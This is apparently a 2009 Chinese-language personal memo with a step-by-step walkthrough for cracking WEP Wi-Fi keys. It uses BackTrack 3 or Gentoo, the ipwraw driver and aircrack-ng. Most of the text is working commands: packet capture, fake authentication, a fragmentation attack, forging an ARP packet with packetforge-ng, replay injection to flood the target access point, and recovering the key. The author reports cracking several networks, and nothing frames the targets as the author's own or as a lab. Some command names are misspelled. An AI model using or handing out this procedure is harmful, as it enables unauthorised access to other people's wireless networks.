20090114註:
現在發現已不需要BT3啟動來破解了,直接在gentoo下用aircrack及載入ipwraw模組就可完成BT3啟動盤中可做的一切。
今天根據google來的一些資料,成功破解了幾個WEP無線網路,由於google來的資料比較雜亂,以下為我破解過程中手寫的過程,在此以做備忘。
對於有無Client串連的AP,都使用此過程可破解WEP。
使用BT3從隨身碟啟動,BT3如下:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb
下載此檔案後,將其中檔案放到隨身碟,並確保boot和BT3目錄放在隨身碟根目錄,執行boot目錄下的bootinst.sh,一路斷行符號後BT3啟動盤製作完成。
1、用BT3啟動,使用KDE。
2、modprobe -r iwl3945
3、modprobe ipwraw
註:以上兩步為是為我的intel 3945ABG網卡載入驅動模組,第一步是卸載原有模組,第二步是載入新模組。
對於在gentoo下沒有ipwraw的,可以去下面地址下載:
wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/ipwraw-ng-2.3.4-04022008.tar.bz2
下載後解壓,然後make && make install && make install_ucode後,再載入此模組。
4、先使用Airoscript查看可用的無線網路
不能在命令列下輸入,要在菜單中找到Airosocript(在哪忘了,在B開頭的菜單,找一會能找到)
5、開啟新視窗,輸入以下:
airodump-ng --ivs -w outputs -c 6 wifi0
註:outputs是儲存的監控的資料檔案名, 6是目標AP的Channel, wifi0是你的網卡裝置號
6、開啟新視窗,輸入以下
aireplay-ng -1 0 -e ESSID -a APMAC -h LOCALMAC wifi0
以上ESSID是目標網路的ESSID, APMAC是目標AP的MAC LOCALMAC是本地網卡的MAC,這些都可以從第4步中找
到,或者使用ifconfig、iwconfig、iwlist來尋找
7、產生XOR檔案用於向目標AP發送攻擊包
aireplay-ns -5 -b APMAC -h LOCALMAC wifi0
出現Read packages字樣後等待,有時讀幾百個包就結束,有時讀幾十萬個也不結束,貌似要看人品。。。
結束後出現 Use this packet ?後,輸入y,在目前的目錄產生了.xor擴充保的檔案。
8、準備發送攻擊包
packetforge-ng -o -a APMAC -h LOCALMAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx.xor -w mrarp
註:上面的-l是L的小寫,.xor就是第6步產生的檔案。
9、發送攻擊包
areplay-ng -2 -r mrarp -x 1024 wifi0
1024是發包間隔,以避免攻擊包速度太快將對方AP搞跨。
執行此步後,會發現第4步輸入後的視窗中,目標AP的記錄中的DATA瘋狂的增長,說明攻擊成功。
10、當DATA增長至3萬左右時,開新視窗,輸入以下:
aircrack-ng -n 64 -b APMAC outputs-0.ivs
註:64指的是64位加密,如果是128的則換成128,.ivs是第4步命令時產生的資料檔案,一般檔案名稱就是第4步起的名字後加數字尾碼。
如果人品好,密碼就會以16進位顯示出來了!